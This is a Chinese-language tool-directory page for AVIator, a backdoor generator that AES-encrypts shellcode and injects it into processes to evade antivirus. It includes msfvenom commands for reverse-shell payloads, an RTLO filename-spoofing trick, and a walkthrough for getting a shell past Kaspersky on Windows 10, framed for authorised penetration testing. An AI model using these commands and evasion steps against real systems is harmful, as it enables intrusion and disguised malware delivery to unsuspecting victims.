Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
AVIator — Antivirus evasion project | Kitploit
工具/GitHubGitHub/ch0pin/aviator
Encryption/Decryption ToolsExploit FrameworksPayload GenerationShellcodePenetration TestingRed TeamingArchived
GitHubch0pin/aviator

AVIator

Antivirus evasion project

查看仓库
1.2k2301年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

AviAtor 移植到 NETCore 5,并拥有更新后的用户界面

AV|Ator

关于://名称

AV: 反病毒

Ator: 是一名剑士、炼金术士、科学家、魔法师、学者和工程师,有时能够凭空制造物品 (https://en.wikipedia.org/wiki/Ator)

关于://目的

AV|Ator 是一个后门生成工具,使用加密和注入技术以绕过反病毒检测。更具体地说:

  • 使用AES加密来加密给定的shellcode
  • 生成一个包含加密payload的可执行文件
  • 使用各种注入技术将shellcode解密并注入到目标系统

[https://attack.mitre.org/techniques/T1055/]:

  1. 可执行文件注入——将恶意代码直接写入进程(无需磁盘上的文件),然后通过附加代码或创建远程线程来触发执行。注入代码的偏移引入了额外要求,即需要重新映射内存引用。此类方法的变体包括反射式DLL注入(将自映射DLL写入进程)和内存模块(写入进程时映射DLL),它们克服了地址重定位问题。

  2. 线程执行劫持——将恶意代码或DLL路径注入到进程的线程中。与Process Hollowing类似,线程必须首先被挂起。

用法

该应用程序有一个包含三个主要输入的表单(见下方截图):

Screenshot 2019-04-29 at 11 41 21

  1. 包含用于加密shellcode的加密密钥的文本
  2. 包含用于AES加密的IV的文本
  3. 包含shellcode的文本

重要提示:shellcode应以C#字节数组的形式提供。

默认值包含执行notepad.exe(32位)的shellcode。此演示旨在指示代码应如何形成(使用msfvenom,可以通过-f csharp开关轻松实现,例如 msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp)。

填写提供的输入并选择输出路径后,将根据所选选项生成一个可执行文件。

RTLO 选项

简而言之,欺骗一个可执行文件使其看起来具有"无害"扩展名,如'pdf'、'txt'等。 例如,文件"testcod.exe"将被解释为"tesexe.doc"

注意,某些杀毒软件会单独将欺骗行为本身视为恶意软件并发出警报。

设置自定义图标

我想大家都知道这是干什么的 :)

在Win 10 x64主机上绕过Kaspersky杀毒软件(测试案例)

在运行完全更新的Kaspersky杀毒软件的Windows 10机器上获取shell

目标机器:Windows 10 x64

  1. 使用msfvenom创建payload

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. 使用以下设置运行AVIator

    目标操作系统架构:x64

    注入技术:线程劫持(Shellcode架构:x64,操作系统架构:x64)

    目标进程:explorer(保持默认)

  3. 在攻击者机器上设置监听器

  4. 在受害者机器上运行生成的可执行文件

安装

Windows:

编译项目或从以下文件夹下载已编译的可执行文件:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

根据您的Linux发行版安装Mono,下载并运行二进制文件

例如在Kali中:

root@kitploit:~
   root@kali# apt install mono-devel 
   
   root@kali# mono aviator.exe

致谢

感谢Damon Mohammadbagher提供的加密程序

免责声明

我开发此应用程序是为了应对渗透测试过程中的艰巨挑战,这也是使用此应用程序的唯一正确方式。请确保您拥有在系统上使用它的必要权限,切勿将其用于非法目的。

下载工具